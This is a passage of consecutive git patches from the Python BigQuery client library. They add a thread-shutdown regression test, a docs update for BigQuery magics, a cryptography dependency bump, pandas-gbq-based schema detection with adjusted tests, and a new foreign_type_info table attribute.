a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index 3a5fddacc..edfaadf69 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -16,6 +16,7 @@ import datetime import decimal import functools +import gc import operator import queue from typing import Union @@ -1846,6 +1847,98 @@ def fake_download_stream( assert queue_used.maxsize == expected_maxsize +@pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") +def test__download_table_bqstorage_shuts_down_workers( + monkeypatch, + module_under_test, +): + """Regression test for https://github.com/googleapis/python-bigquery/issues/2032 + + Make sure that when the top-level iterator goes out of scope (is deleted), + the child threads are also stopped. + """ + from google.cloud.bigquery import dataset + from google.cloud.bigquery import table + import google.cloud.bigquery_storage_v1.reader + import google.cloud.bigquery_storage_v1.types + + monkeypatch.setattr( + _versions_helpers.BQ_STORAGE_VERSIONS, "_installed_version", None + ) + monkeypatch.setattr(bigquery_storage, "__version__", "2.5.0") + + # Create a fake stream with a decent number of rows. + arrow_schema = pyarrow.schema( + [ + ("int_col", pyarrow.int64()), + ("str_col", pyarrow.string()), + ] + ) + arrow_rows = pyarrow.record_batch( + [ + pyarrow.array([0, 1, 2], type=pyarrow.int64()), + pyarrow.array(["a", "b", "c"], type=pyarrow.string()), + ], + schema=arrow_schema, + ) + session = google.cloud.bigquery_storage_v1.types.ReadSession() + session.data_format = "ARROW" + session.arrow_schema = {"serialized_schema": arrow_schema.serialize().to_pybytes()} + session.streams = [ + google.cloud.bigquery_storage_v1.types.ReadStream(name=name) + for name in ("stream/s0", "stream/s1", "stream/s2") + ] + bqstorage_client = mock.create_autospec( + bigquery_storage.BigQueryReadClient, instance=True + ) + reader = mock.create_autospec( + google.cloud.bigquery_storage_v1.reader.ReadRowsStream, instance=True + ) + reader.__iter__.return_value = [ + google.cloud.bigquery_storage_v1.types.ReadRowsResponse( + arrow_schema={"serialized_schema": arrow_schema.serialize().to_pybytes()}, + arrow_record_batch={ + "serialized_record_batch": arrow_rows.serialize().to_pybytes() + }, + ) + for _ in range(100) + ] + reader.rows.return_value = google.cloud.bigquery_storage_v1.reader.ReadRowsIterable( + reader, read_session=session + ) + bqstorage_client.read_rows.return_value = reader + bqstorage_client.create_read_session.return_value = session + table_ref = table.TableReference( + dataset.DatasetReference("project-x", "dataset-y"), + "table-z", + ) + download_state = module_under_test._DownloadState() + assert download_state.started_workers == 0 + assert download_state.finished_workers == 0 + + result_gen = module_under_test._download_table_bqstorage( + "some-project", + table_ref, + bqstorage_client, + max_queue_size=1, + page_to_item=module_under_test._bqstorage_page_to_arrow, + download_state=download_state, + ) + + result_gen_iter = iter(result_gen) + next(result_gen_iter) + assert download_state.started_workers == 3 + assert download_state.finished_workers == 0 + + # Stop iteration early and simulate the variables going out of scope + # to be doubly sure that the worker threads are supposed to be cleaned up. + del result_gen, result_gen_iter + gc.collect() + + assert download_state.started_workers == 3 + assert download_state.finished_workers == 3 + + @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") def test_download_arrow_row_iterator_unknown_field_type(module_under_test): fake_page = api_core.page_iterator.Page( From b5bcfb303d27015b747a3b0747ecd7f7ed0ed557 Mon Sep 17 00:00:00 2001 From: Alicia Williams Date: Fri, 14 Feb 2025 12:50:18 -0800 Subject: [PATCH 062/202] docs: update magics.rst (#2125) * Update magics.rst use bigquery-magics package for the %%bigquery magic * Update magics.rst add back space * update reference and link for bigquery magics --------- Co-authored-by: Lingqing Gan --- docs/magics.rst | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/docs/magics.rst b/docs/magics.rst index aa14c6bfa..549d67f76 100644 --- a/docs/magics.rst +++ b/docs/magics.rst @@ -6,7 +6,7 @@ in a Jupyter notebook cell. .. code:: - %load_ext google.cloud.bigquery + %load_ext bigquery_magics This makes the ``%%bigquery`` magic available. @@ -27,8 +27,9 @@ Running a parameterized query: :start-after: [START bigquery_jupyter_query_params_scalars] :end-before: [END bigquery_jupyter_query_params_scalars] -API Reference -------------- +BigQuery Magics Reference +------------------------- -.. automodule:: google.cloud.bigquery.magics.magics - :members: +- `BigQuery Magics Documentation`_ + +.. _BigQuery Magics Documentation: https://googleapis.dev/python/bigquery-magics/latest From b03a2afabde7f42be45f62fabd3dc0e6a9a493e1 Mon Sep 17 00:00:00 2001 From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com> Date: Fri, 14 Feb 2025 14:11:49 -0800 Subject: [PATCH 063/202] chore(deps): bump cryptography from 43.0.1 to 44.0.1 in /.kokoro (#2130) Bumps [cryptography](https://github.com/pyca/cryptography) from 43.0.1 to 44.0.1. - [Changelog](https://github.com/pyca/cryptography/blob/main/CHANGELOG.rst) - [Commits](https://github.com/pyca/cryptography/compare/43.0.1...44.0.1) --- updated-dependencies: - dependency-name: cryptography dependency-type: direct:production ... Signed-off-by: dependabot[bot] Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Lingqing Gan --- .kokoro/requirements.txt | 60 +++++++++++++++++++++------------------- 1 file changed, 32 insertions(+), 28 deletions(-) diff --git a/.kokoro/requirements.txt b/.kokoro/requirements.txt index 16db448c1..6ad95a04a 100644 --- a/.kokoro/requirements.txt +++ b/.kokoro/requirements.txt @@ -112,34 +112,38 @@ colorlog==6.8.2 \ # via # gcp-docuploader # nox -cryptography==43.0.1 \ - --hash=sha256:014f58110f53237ace6a408b5beb6c427b64e084eb451ef25a28308270086494 \ - --hash=sha256:1bbcce1a551e262dfbafb6e6252f1ae36a248e615ca44ba302df077a846a8806 \ - --hash=sha256:203e92a75716d8cfb491dc47c79e17d0d9207ccffcbcb35f598fbe463ae3444d \ - --hash=sha256:27e613d7077ac613e399270253259d9d53872aaf657471473ebfc9a52935c062 \ - --hash=sha256:2bd51274dcd59f09dd952afb696bf9c61a7a49dfc764c04dd33ef7a6b502a1e2 \ - --hash=sha256:38926c50cff6f533f8a2dae3d7f19541432610d114a70808f0926d5aaa7121e4 \ - --hash=sha256:511f4273808ab590912a93ddb4e3914dfd8a388fed883361b02dea3791f292e1 \ - --hash=sha256:58d4e9129985185a06d849aa6df265bdd5a74ca6e1b736a77959b498e0505b85 \ - --hash=sha256:5b43d1ea6b378b54a1dc99dd8a2b5be47658fe9a7ce0a58ff0b55f4b43ef2b84 \ - --hash=sha256:61ec41068b7b74268fa86e3e9e12b9f0c21fcf65434571dbb13d954bceb08042 \ - --hash=sha256:666ae11966643886c2987b3b721899d250855718d6d9ce41b521252a17985f4d \ - --hash=sha256:68aaecc4178e90719e95298515979814bda0cbada1256a4485414860bd7ab962 \ - --hash=sha256:7c05650fe8023c5ed0d46793d4b7d7e6cd9c04e68eabe5b0aeea836e37bdcec2 \ - --hash=sha256:80eda8b3e173f0f247f711eef62be51b599b5d425c429b5d4ca6a05e9e856baa \ - --hash=sha256:8385d98f6a3bf8bb2d65a73e17ed87a3ba84f6991c155691c51112075f9ffc5d \ - --hash=sha256:88cce104c36870d70c49c7c8fd22885875d950d9ee6ab54df2745f83ba0dc365 \ - --hash=sha256:9d3cdb25fa98afdd3d0892d132b8d7139e2c087da1712041f6b762e4f807cc96 \ - --hash=sha256:a575913fb06e05e6b4b814d7f7468c2c660e8bb16d8d5a1faf9b33ccc569dd47 \ - --hash=sha256:ac119bb76b9faa00f48128b7f5679e1d8d437365c5d26f1c2c3f0da4ce1b553d \ - --hash=sha256:c1332724be35d23a854994ff0b66530119500b6053d0bd3363265f7e5e77288d \ - --hash=sha256:d03a475165f3134f773d1388aeb19c2d25ba88b6a9733c5c590b9ff7bbfa2e0c \ - --hash=sha256:d75601ad10b059ec832e78823b348bfa1a59f6b8d545db3a24fd44362a1564cb \ - --hash=sha256:de41fd81a41e53267cb020bb3a7212861da53a7d39f863585d13ea11049cf277 \ - --hash=sha256:e710bf40870f4db63c3d7d929aa9e09e4e7ee219e703f949ec4073b4294f6172 \ - --hash=sha256:ea25acb556320250756e53f9e20a4177515f012c9eaea17eb7587a8c4d8ae034 \ - --hash=sha256:f98bf604c82c416bc829e490c700ca1553eafdf2912a91e23a79d97d9801372a \ - --hash=sha256:fba1007b3ef89946dbbb515aeeb41e30203b004f0b4b00e5e16078b518563289 +cryptography==44.0.1 \ + --hash=sha256:00918d859aa4e57db8299607086f793fa7813ae2ff5a4637e318a25ef82730f7 \ + --hash=sha256:1e8d181e90a777b63f3f0caa836844a1182f1f265687fac2115fcf245f5fbec3 \ + --hash=sha256:1f9a92144fa0c877117e9748c74501bea842f93d21ee00b0cf922846d9d0b183 \ + --hash=sha256:21377472ca4ada2906bc313168c9dc7b1d7ca417b63c1c3011d0c74b7de9ae69 \ + --hash=sha256:24979e9f2040c953a94bf3c6782e67795a4c260734e5264dceea65c8f4bae64a \ + --hash=sha256:2a46a89ad3e6176223b632056f321bc7de36b9f9b93b2cc1cccf935a3849dc62 \ + --hash=sha256:322eb03ecc62784536bc173f1483e76747aafeb69c8728df48537eb431cd1911 \ + --hash=sha256:436df4f203482f41aad60ed1813811ac4ab102765ecae7a2bbb1dbb66dcff5a7 \ + --hash=sha256:4f422e8c6a28cf8b7f883eb790695d6d45b0c385a2583073f3cec434cc705e1a \ + --hash=sha256:53f23339864b617a3dfc2b0ac8d5c432625c80014c25caac9082314e9de56f41 \ + --hash=sha256:5fed5cd6102bb4eb843e3315d2bf25fede494509bddadb81e03a859c1bc17b83 \ + --hash=sha256:610a83540765a8d8ce0f351ce42e26e53e1f774a6efb71eb1b41eb01d01c3d12 \ + --hash=sha256:6c8acf6f3d1f47acb2248ec3ea261171a671f3d9428e34ad0357148d492c7864 \ + --hash=sha256:6f76fdd6fd048576a04c5210d53aa04ca34d2ed63336d4abd306d0cbe298fddf \ + --hash=sha256:72198e2b5925155497a5a3e8c216c7fb3e64c16ccee11f0e7da272fa93b35c4c \ + --hash=sha256:887143b9ff6bad2b7570da75a7fe8bbf5f65276365ac259a5d2d5147a73775f2 \ + --hash=sha256:888fcc3fce0c888785a4876ca55f9f43787f4c5c1cc1e2e0da71ad481ff82c5b \ + --hash=sha256:8e6a85a93d0642bd774460a86513c5d9d80b5c002ca9693e63f6e540f1815ed0 \ + --hash=sha256:94f99f2b943b354a5b6307d7e8d19f5c423a794462bde2bf310c770ba052b1c4 \ + --hash=sha256:9b336599e2cb77b1008cb2ac264b290803ec5e8e89d618a5e978ff5eb6f715d9 \ + --hash=sha256:a2d8a7045e1ab9b9f803f0d9531ead85f90c5f2859e653b61497228b18452008 \ + --hash=sha256:b8272f257cf1cbd3f2e120f14c68bff2b6bdfcc157fafdee84a1b795efd72862 \ + --hash=sha256:bf688f615c29bfe9dfc44312ca470989279f0e94bb9f631f85e3459af8efc009 \ + --hash=sha256:d9c5b9f698a83c8bd71e0f4d3f9f839ef244798e5ffe96febfa9714717db7af7 \ + --hash=sha256:dd7c7e2d71d908dc0f8d2027e1604102140d84b155e658c20e8ad1304317691f \ + --hash=sha256:df978682c1504fc93b3209de21aeabf2375cb1571d4e61907b3e7a2540e83026 \ + --hash=sha256:e403f7f766ded778ecdb790da786b418a9f2394f36e8cc8b796cc056ab05f44f \ + --hash=sha256:eb3889330f2a4a148abead555399ec9a32b13b7c8ba969b72d8e500eb7ef84cd \ + --hash=sha256:f4daefc971c2d1f82f03097dc6f216744a6cd2ac0f04c68fb935ea2ba2a0d420 \ + --hash=sha256:f51f5705ab27898afda1aaa430f34ad90dc117421057782022edf0600bec5f14 \ + --hash=sha256:fd0ee90072861e276b0ff08bd627abec29e32a53b2be44e41dbcdf87cbee2b00 # via # -r requirements.in # gcp-releasetool From 7603bd71d60592ef2a551d9eea09987b218edc73 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Tim=20Swe=C3=B1a=20=28Swast=29?= Date: Fri, 21 Feb 2025 11:44:59 -0600 Subject: [PATCH 064/202] deps: use pandas-gbq to determine schema in `load_table_from_dataframe` (#2095) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * feat: use pandas-gbq to determine schema in `load_table_from_dataframe` * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * fix some unit tests * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * bump minimum pandas-gbq to 0.26.1 * πŸ¦‰ Updates from OwlBot post-processor See https://github.com/googleapis/repo-automation-bots/blob/main/packages/owl-bot/README.md * drop pandas-gbq from python 3.7 extras * relax warning message text assertion * use consistent time zone presense/absense in time datetime system test * Update google/cloud/bigquery/_pandas_helpers.py * Update google/cloud/bigquery/_pandas_helpers.py Co-authored-by: Chalmer Lowe * remove pandas-gbq from at least 1 unit test and system test session --------- Co-authored-by: Owl Bot Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/_pandas_helpers.py | 35 +++++++++++- google/cloud/bigquery/_pyarrow_helpers.py | 7 ++- noxfile.py | 15 ++++++ pyproject.toml | 3 ++ testing/constraints-3.8.txt | 9 ++++ tests/system/test_pandas.py | 2 +- tests/unit/test__pandas_helpers.py | 65 +++++++++++++++++++---- tests/unit/test_client.py | 33 +++++++++--- 8 files changed, 147 insertions(+), 22 deletions(-) diff --git a/google/cloud/bigquery/_pandas_helpers.py b/google/cloud/bigquery/_pandas_helpers.py index 4f70f6c29..0017d92ce 100644 --- a/google/cloud/bigquery/_pandas_helpers.py +++ b/google/cloud/bigquery/_pandas_helpers.py @@ -12,7 +12,12 @@ # See the License for the specific language governing permissions and # limitations under the License. -"""Shared helper functions for connecting BigQuery and pandas.""" +"""Shared helper functions for connecting BigQuery and pandas. + +NOTE: This module is DEPRECATED. Please make updates in the pandas-gbq package, +instead. See: go/pandas-gbq-and-bigframes-redundancy and +https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/pandas_to_bigquery.py +""" import concurrent.futures from datetime import datetime @@ -40,6 +45,16 @@ else: import numpy + +try: + import pandas_gbq.schema.pandas_to_bigquery # type: ignore + + pandas_gbq_import_exception = None +except ImportError as exc: + pandas_gbq = None + pandas_gbq_import_exception = exc + + try: import db_dtypes # type: ignore @@ -445,6 +460,10 @@ def _first_array_valid(series): def dataframe_to_bq_schema(dataframe, bq_schema): """Convert a pandas DataFrame schema to a BigQuery schema. + DEPRECATED: Use + pandas_gbq.schema.pandas_to_bigquery.dataframe_to_bigquery_fields(), + instead. See: go/pandas-gbq-and-bigframes-redundancy. + Args: dataframe (pandas.DataFrame): DataFrame for which the client determines the BigQuery schema. @@ -460,6 +479,20 @@ def dataframe_to_bq_schema(dataframe, bq_schema): The automatically determined schema. Returns None if the type of any column cannot be determined. """ + if pandas_gbq is None: + warnings.warn( + "Loading pandas DataFrame into BigQuery will require pandas-gbq " + "package version 0.26.1 or greater in the future. " + f"Tried to import pandas-gbq and got: {pandas_gbq_import_exception}", + category=FutureWarning, + ) + else: + return pandas_gbq.schema.pandas_to_bigquery.dataframe_to_bigquery_fields( + dataframe, + override_bigquery_fields=bq_schema, + index=True, + ) + if bq_schema: bq_schema = schema._to_schema_fields(bq_schema) bq_schema_index = {field.name: field for field in bq_schema} diff --git a/google/cloud/bigquery/_pyarrow_helpers.py b/google/cloud/bigquery/_pyarrow_helpers.py index 3c745a611..1b42cd5c7 100644 --- a/google/cloud/bigquery/_pyarrow_helpers.py +++ b/google/cloud/bigquery/_pyarrow_helpers.py @@ -12,7 +12,12 @@ # See the License for the specific language governing permissions and # limitations under the License. -"""Shared helper functions for connecting BigQuery and pyarrow.""" +"""Shared helper functions for connecting BigQuery and pyarrow. + +NOTE: This module is DEPRECATED. Please make updates in the pandas-gbq package, +instead. See: go/pandas-gbq-and-bigframes-redundancy and +https://github.com/googleapis/python-bigquery-pandas/blob/main/pandas_gbq/schema/pyarrow_to_bigquery.py +""" from typing import Any diff --git a/noxfile.py b/noxfile.py index e08956b11..87bd9a70c 100644 --- a/noxfile.py +++ b/noxfile.py @@ -110,6 +110,14 @@ def default(session, install_extras=True): else: install_target = "." session.install("-e", install_target, "-c", constraints_path) + + # Test with some broken "extras" in case the user didn't install the extra + # directly. For example, pandas-gbq is recommended for pandas features, but + # we want to test that we fallback to the previous behavior. For context, + # see internal document go/pandas-gbq-and-bigframes-redundancy. + if session.python == UNIT_TEST_PYTHON_VERSIONS[0]: + session.run("python", "-m", "pip", "uninstall", "pandas-gbq", "-y") + session.run("python", "-m", "pip", "freeze") # Run py.test against the unit tests. @@ -228,6 +236,13 @@ def system(session): extras = "[all]" session.install("-e", f".{extras}", "-c", constraints_path) + # Test with some broken "extras" in case the user didn't install the extra + # directly. For example, pandas-gbq is recommended for pandas features, but + # we want to test that we fallback to the previous behavior. For context, + # see internal document go/pandas-gbq-and-bigframes-redundancy. + if session.python == SYSTEM_TEST_PYTHON_VERSIONS[0]: + session.run("python", "-m", "pip", "uninstall", "pandas-gbq", "-y") + # print versions of all dependencies session.run("python", "-m", "pip", "freeze") diff --git a/pyproject.toml b/pyproject.toml index ecf21d922..c4e5c2f0d 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -74,6 +74,9 @@ bqstorage = [ ] pandas = [ "pandas >= 1.1.0", + "pandas-gbq >= 0.26.1; python_version >= '3.8'", + "grpcio >= 1.47.0, < 2.0dev", + "grpcio >= 1.49.1, < 2.0dev; python_version >= '3.11'", "pyarrow >= 3.0.0", "db-dtypes >= 0.3.0, < 2.0.0dev", "importlib_metadata >= 1.0.0; python_version < '3.8'", diff --git a/testing/constraints-3.8.txt b/testing/constraints-3.8.txt index e5e73c5c7..9883fb8cc 100644 --- a/testing/constraints-3.8.txt +++ b/testing/constraints-3.8.txt @@ -1,2 +1,11 @@ grpcio==1.47.0 pandas==1.2.0 + +# This constraints file is used to check that lower bounds +# are correct in setup.py +# +# Pin the version to the lower bound. +# +# e.g., if setup.py has "foo >= 1.14.0, < 2.0.0dev", +# Then this file should have foo==1.14.0 +pandas-gbq==0.26.1 diff --git a/tests/system/test_pandas.py b/tests/system/test_pandas.py index 85c7b79e6..a9e76d416 100644 --- a/tests/system/test_pandas.py +++ b/tests/system/test_pandas.py @@ -1259,7 +1259,7 @@ def test_upload_time_and_datetime_56(bigquery_client, dataset_id): df = pandas.DataFrame( dict( dt=[ - datetime.datetime(2020, 1, 8, 8, 0, 0), + datetime.datetime(2020, 1, 8, 8, 0, 0, tzinfo=datetime.timezone.utc), datetime.datetime( 2020, 1, diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index edfaadf69..fdd232a5c 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -35,6 +35,11 @@ except ImportError: pandas = None +try: + import pandas_gbq.schema.pandas_to_bigquery +except ImportError: + pandas_gbq = None + try: import geopandas except ImportError: @@ -1281,7 +1286,21 @@ def test_dataframe_to_parquet_compression_method(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_w_named_index(module_under_test): +@pytest.mark.skipif(pandas_gbq is None, reason="Requires `pandas-gbq`") +def test_dataframe_to_bq_schema_returns_schema_with_pandas_gbq( + module_under_test, monkeypatch +): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame({"field00": ["foo", "bar"]}) + got = module_under_test.dataframe_to_bq_schema(dataframe, []) + # Don't assert beyond this, since pandas-gbq is now source of truth. + assert got is not None + + +@pytest.mark.skipif(pandas is None, reason="Requires `pandas`") +def test_dataframe_to_bq_schema_w_named_index(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), @@ -1292,7 +1311,8 @@ def test_dataframe_to_bq_schema_w_named_index(module_under_test): index = pandas.Index(["a", "b"], name="str_index") dataframe = pandas.DataFrame(df_data, index=index) - returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) + with pytest.warns(FutureWarning, match="pandas-gbq"): + returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) expected_schema = ( schema.SchemaField("str_index", "STRING", "NULLABLE"), @@ -1304,7 +1324,9 @@ def test_dataframe_to_bq_schema_w_named_index(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_w_multiindex(module_under_test): +def test_dataframe_to_bq_schema_w_multiindex(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), @@ -1321,7 +1343,8 @@ def test_dataframe_to_bq_schema_w_multiindex(module_under_test): ) dataframe = pandas.DataFrame(df_data, index=index) - returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) + with pytest.warns(FutureWarning, match="pandas-gbq"): + returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, []) expected_schema = ( schema.SchemaField("str_index", "STRING", "NULLABLE"), @@ -1335,7 +1358,9 @@ def test_dataframe_to_bq_schema_w_multiindex(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_w_bq_schema(module_under_test): +def test_dataframe_to_bq_schema_w_bq_schema(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df_data = collections.OrderedDict( [ ("str_column", ["hello", "world"]), @@ -1350,7 +1375,10 @@ def test_dataframe_to_bq_schema_w_bq_schema(module_under_test): {"name": "bool_column", "type": "BOOL", "mode": "REQUIRED"}, ] - returned_schema = module_under_test.dataframe_to_bq_schema(dataframe, dict_schema) + with pytest.warns(FutureWarning, match="pandas-gbq"): + returned_schema = module_under_test.dataframe_to_bq_schema( + dataframe, dict_schema + ) expected_schema = ( schema.SchemaField("str_column", "STRING", "NULLABLE"), @@ -1361,7 +1389,11 @@ def test_dataframe_to_bq_schema_w_bq_schema(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") -def test_dataframe_to_bq_schema_fallback_needed_wo_pyarrow(module_under_test): +def test_dataframe_to_bq_schema_fallback_needed_wo_pyarrow( + module_under_test, monkeypatch +): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame( data=[ {"id": 10, "status": "FOO", "execution_date": datetime.date(2019, 5, 10)}, @@ -1389,7 +1421,11 @@ def test_dataframe_to_bq_schema_fallback_needed_wo_pyarrow(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") -def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test): +def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow( + module_under_test, monkeypatch +): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame( data=[ {"id": 10, "status": "FOO", "created_at": datetime.date(2019, 5, 10)}, @@ -1419,7 +1455,9 @@ def test_dataframe_to_bq_schema_fallback_needed_w_pyarrow(module_under_test): @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") -def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test): +def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test, monkeypatch): + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + dataframe = pandas.DataFrame( data=[ {"struct_field": {"one": 2}, "status": "FOO"}, @@ -1443,9 +1481,11 @@ def test_dataframe_to_bq_schema_pyarrow_fallback_fails(module_under_test): @pytest.mark.skipif(geopandas is None, reason="Requires `geopandas`") -def test_dataframe_to_bq_schema_geography(module_under_test): +def test_dataframe_to_bq_schema_geography(module_under_test, monkeypatch): from shapely import wkt + monkeypatch.setattr(module_under_test, "pandas_gbq", None) + df = geopandas.GeoDataFrame( pandas.DataFrame( dict( @@ -1456,7 +1496,10 @@ def test_dataframe_to_bq_schema_geography(module_under_test): ), geometry="geo1", ) - bq_schema = module_under_test.dataframe_to_bq_schema(df, []) + + with pytest.warns(FutureWarning, match="pandas-gbq"): + bq_schema = module_under_test.dataframe_to_bq_schema(df, []) + assert bq_schema == ( schema.SchemaField("name", "STRING"), schema.SchemaField("geo1", "GEOGRAPHY"), diff --git a/tests/unit/test_client.py b/tests/unit/test_client.py index 462a70bbe..a5af37b6b 100644 --- a/tests/unit/test_client.py +++ b/tests/unit/test_client.py @@ -8391,8 +8391,12 @@ def test_load_table_from_dataframe_w_automatic_schema_detection_fails(self): autospec=True, side_effect=google.api_core.exceptions.NotFound("Table not found"), ) + pandas_gbq_patch = mock.patch( + "google.cloud.bigquery._pandas_helpers.pandas_gbq", + new=None, + ) - with load_patch as load_table_from_file, get_table_patch: + with load_patch as load_table_from_file, get_table_patch, pandas_gbq_patch: with warnings.catch_warnings(record=True) as warned: client.load_table_from_dataframe( dataframe, self.TABLE_REF, location=self.LOCATION @@ -8448,7 +8452,6 @@ def test_load_table_from_dataframe_w_index_and_auto_schema(self): load_patch = mock.patch( "google.cloud.bigquery.client.Client.load_table_from_file", autospec=True ) - get_table_patch = mock.patch( "google.cloud.bigquery.client.Client.get_table", autospec=True, @@ -8460,6 +8463,7 @@ def test_load_table_from_dataframe_w_index_and_auto_schema(self): ] ), ) + with load_patch as load_table_from_file, get_table_patch: client.load_table_from_dataframe( dataframe, self.TABLE_REF, location=self.LOCATION @@ -8580,10 +8584,10 @@ def test_load_table_from_dataframe_w_nullable_int64_datatype_automatic_schema(se client = self._make_client() dataframe = pandas.DataFrame({"x": [1, 2, None, 4]}, dtype="Int64") + load_patch = mock.patch( "google.cloud.bigquery.client.Client.load_table_from_file", autospec=True ) - get_table_patch = mock.patch( "google.cloud.bigquery.client.Client.get_table", autospec=True, @@ -8612,8 +8616,11 @@ def test_load_table_from_dataframe_w_nullable_int64_datatype_automatic_schema(se sent_config = load_table_from_file.mock_calls[0][2]["job_config"] assert sent_config.source_format == job.SourceFormat.PARQUET - assert tuple(sent_config.schema) == ( - SchemaField("x", "INT64", "NULLABLE", None), + assert ( + # Accept either the GoogleSQL or legacy SQL type name from pandas-gbq. + tuple(sent_config.schema) == (SchemaField("x", "INT64", "NULLABLE", None),) + or tuple(sent_config.schema) + == (SchemaField("x", "INTEGER", "NULLABLE", None),) ) def test_load_table_from_dataframe_struct_fields(self): @@ -8759,7 +8766,7 @@ def test_load_table_from_dataframe_array_fields_w_auto_schema(self): data=records, columns=["float_column", "array_column"] ) - expected_schema = [ + expected_schema_googlesql = [ SchemaField("float_column", "FLOAT"), SchemaField( "array_column", @@ -8767,6 +8774,14 @@ def test_load_table_from_dataframe_array_fields_w_auto_schema(self): mode="REPEATED", ), ] + expected_schema_legacy_sql = [ + SchemaField("float_column", "FLOAT"), + SchemaField( + "array_column", + "INTEGER", + mode="REPEATED", + ), + ] load_patch = mock.patch( "google.cloud.bigquery.client.Client.load_table_from_file", autospec=True @@ -8802,7 +8817,10 @@ def test_load_table_from_dataframe_array_fields_w_auto_schema(self): sent_config = load_table_from_file.mock_calls[0][2]["job_config"] assert sent_config.source_format == job.SourceFormat.PARQUET - assert sent_config.schema == expected_schema + assert ( + sent_config.schema == expected_schema_googlesql + or sent_config.schema == expected_schema_legacy_sql + ) def test_load_table_from_dataframe_w_partial_schema(self): pandas = pytest.importorskip("pandas") @@ -8922,7 +8940,6 @@ def test_load_table_from_dataframe_w_partial_schema_extra_types(self): load_table_from_file.assert_not_called() message = str(exc_context.value) - assert "bq_schema contains fields not present in dataframe" in message assert "unknown_col" in message def test_load_table_from_dataframe_w_schema_arrow_custom_compression(self): From 2c1968115bef8e1dc84e0125615f551b9b011a4b Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Fri, 21 Feb 2025 12:45:15 -0500 Subject: [PATCH 065/202] Feat: Adds foreign_type_info attribute to table class and adds unit tests. (#2126) * adds foreign_type_info attribute to table * feat: Adds foreign_type_info attribute and tests * updates docstrings for foreign_type_info * Updates property handling, especially as regards set/get_sub_prop * Removes extraneous comments and debug expressions * Refactors build_resource_from_properties w get/set_sub_prop * updates to foreign_type_info, tests and wiring * Adds logic to detect non-Sequence schema.fields value * updates assorted tests and logic --- google/cloud/bigquery/_helpers.py | 4 +- google/cloud/bigquery/schema.py | 57 ++++++---- google/cloud/bigquery/table.py | 75 +++++++++++- tests/unit/job/test_load.py | 2 +- tests/unit/test_client.py | 8 +- tests/unit/test_schema.py | 183 +++++++++++++++++++----------- tests/unit/test_table.py | 173 +++++++++++++++++++++++++++- 7 files changed, 398 insertions(+), 104 deletions(-) diff --git a/google/cloud/bigquery/_helpers.py b/google/cloud/bigquery/_helpers.py index ea47af28d..d40217c4d 100644 --- a/google/cloud/bigquery/_helpers.py +++ b/google/cloud/bigquery/_helpers.py @@ -978,11 +978,11 @@ def _build_resource_from_properties(obj, filter_fields): """ partial = {} for filter_field in filter_fields: - api_field = obj._PROPERTY_TO_API_FIELD.get(filter_field) + api_field = _get_sub_prop(obj._PROPERTY_TO_API_FIELD, filter_field) if api_field is None and filter_field not in obj._properties: raise ValueError("No property %s" % filter_field) elif api_field is not None: - partial[api_field] = obj._properties.get(api_field) + _set_sub_prop(partial, api_field, _get_sub_prop(obj._properties, api_field)) else: # allows properties that are not defined in the library # and properties that have the same name as API resource key diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 0f011a275..03cde830e 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -15,10 +15,9 @@ """Schemas for BigQuery tables / queries.""" from __future__ import annotations -import collections import enum import typing -from typing import 